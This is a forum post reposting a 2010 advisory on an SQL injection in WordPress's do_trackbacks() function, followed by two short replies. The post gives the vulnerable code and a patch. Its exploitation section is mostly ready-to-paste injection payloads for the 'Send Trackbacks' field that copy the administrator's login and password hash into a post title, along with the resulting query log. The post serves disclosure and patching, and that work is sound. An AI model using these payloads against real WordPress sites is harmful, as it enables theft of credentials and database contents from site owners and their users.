WordPress all version 0day exploit - Web Application Security

undead

Description:
SQL injection vulnerability in do_trackbacks() function of WordPress allows remote attackers to execute arbitrary SELECT SQL query.

Access Vector: Network
Attack Complexity: Medium
Authentication: Single Instance
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None

UPDATE Dec 1, 2010:
This vulnerability was first discovered by M4g and is described in this article.

The do_trackbacks() function in wp-includes/comment.php does not properly escape the input that comes from the user, allowing a remote user with publish_posts and edit_published_posts capabilities to execute an arbitrary SELECT SQL query, which can lead to disclosure of any information stored in the WordPress database.

function do_trackbacks($post_id) {
    global $wpdb;
 
    $post = $wpdb-&gt;get_row( $wpdb-&gt;prepare(\"SELECT * FROM $wpdb-&gt;posts WHERE ID = %d\", $post_id) );
    $to_ping = get_to_ping($post_id);
    $pinged  = get_pung($post_id);
    if ( empty($to_ping) ) {
        $wpdb-&gt;update($wpdb-&gt;posts, array('to_ping' =&gt; ''), array('ID' =&gt; $post_id) );
        return;
    }
 
    if ( empty($post-&gt;post_excerpt) )
        $excerpt = apply_filters('the_content', $post-&gt;post_content);
    else
        $excerpt = apply_filters('the_excerpt', $post-&gt;post_excerpt);
    $excerpt = str_replace('&#93;&#93;&gt;', '&#93;&#93;&gt;', $excerpt);
    $excerpt = wp_html_excerpt($excerpt, 252) &#46; '&#46;&#46;&#46;';
 
    $post_title = apply_filters('the_title', $post-&gt;post_title);
    $post_title = strip_tags($post_title);
 
    if ( $to_ping ) {
        foreach ( (array) $to_ping as $tb_ping ) {
            $tb_ping = trim($tb_ping);
            if ( !in_array($tb_ping, $pinged) ) {
                trackback($tb_ping, $post_title, $excerpt, $post_id);
                $pinged&#91;&#93; = $tb_ping;
            } else {
                $wpdb-&gt;query( $wpdb-&gt;prepare(\"UPDATE $wpdb-&gt;posts SET to_ping = TRIM(REPLACE(to_ping, '$tb_ping', '')) WHERE ID = %d\", $post_id) );
            }
        }
    }
}

The $tb_ping variable is passed to the query in line 1657 unescaped.

Exploitation.
The logged in user must have publish_posts and edit_published_posts capabilities (this corresponds to the Author role).
Below is an example of how this vulnerability can be exploited (images below are clickable):
http://blog.sjinks.pro/wp-content/uploads/2010/11/01-300x132.png
First, the user creates a new post (title/content does not matter); text to put into the â€œSend Trackbacksâ€ field is

AAAâ€™,â€)),post_title=(select/**/concat(user_login,â€™|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,â€™

and publishes it. He needs to wait a bit â€” for wp-cron.php to process the trackback. The get_to_ping() function says that this trackback is to be processed:

AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'

Then the user goes back and edits the post:
http://blog.sjinks.pro/wp-content/uploads/2010/11/02-300x111.png

Now the user duplicates the text in the â€œSend Trackbacksâ€ field and updates the post

AAAâ€™,â€)),post_title=(select/**/concat(user_login,â€™|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,â€™ AAAâ€™,â€)),post_title=(select/**/concat(user_login,â€™|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,â€™

The get_to_ping() function says that these trackbacks are to be processed:

AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'
AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'

Query logging shows that WordPress executes this query (reformatted for the sake of readbility):

UPDATE wp_posts
SET to_ping = TRIM(REPLACE(to_ping, 'AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'', ''))
WHERE ID = 11

After that when the user refreshes the page (he may need to wait a bit for wp-cron.php to complete), he will see something like this:
http://blog.sjinks.pro/wp-content/uploads/2010/11/03-300x153.png
Likewise, any information (login salt, nonce salt, email addresses etc) can be disclosed.
The screenshots above are for WordPress 3.0.1 but the vulnerability seems to exist since 2.x branch.

Patch: below is the patch against WordPress 3.1 rev. 16609 that fixes the vulnerability

Index&#58; wp-includes/comment&#46;php
===================================================================
--- wp-includes/comment&#46;php (revision 16609)
+++ wp-includes/comment&#46;php (working copy)
@@ -1723,7 +1723,7 @@
                trackback($tb_ping, $post_title, $excerpt, $post_id);
                $pinged&#91;&#93; = $tb_ping;
            } else {
-               $wpdb-&gt;query( $wpdb-&gt;prepare(\"UPDATE $wpdb-&gt;posts SET to_ping = TRIM(REPLACE(to_ping, '$tb_ping', '')) WHERE ID = %d\", $post_id) );
+               $wpdb-&gt;query( $wpdb-&gt;prepare(\"UPDATE $wpdb-&gt;posts SET to_ping = TRIM(REPLACE(to_ping, %s, '')) WHERE ID = %d\", $tb_ping, $post_id) );
            }
        }
    }

Source: www.vul.kr

Xin

Interesting , il try this out

chroniccommand

Nice find seems like a cool exploit. Not a 0day anymore ;)
I prefer to keep my 0day's private. I only have 2 though lol.

Howdy, Stranger!

Top Posters

Who's Online (0)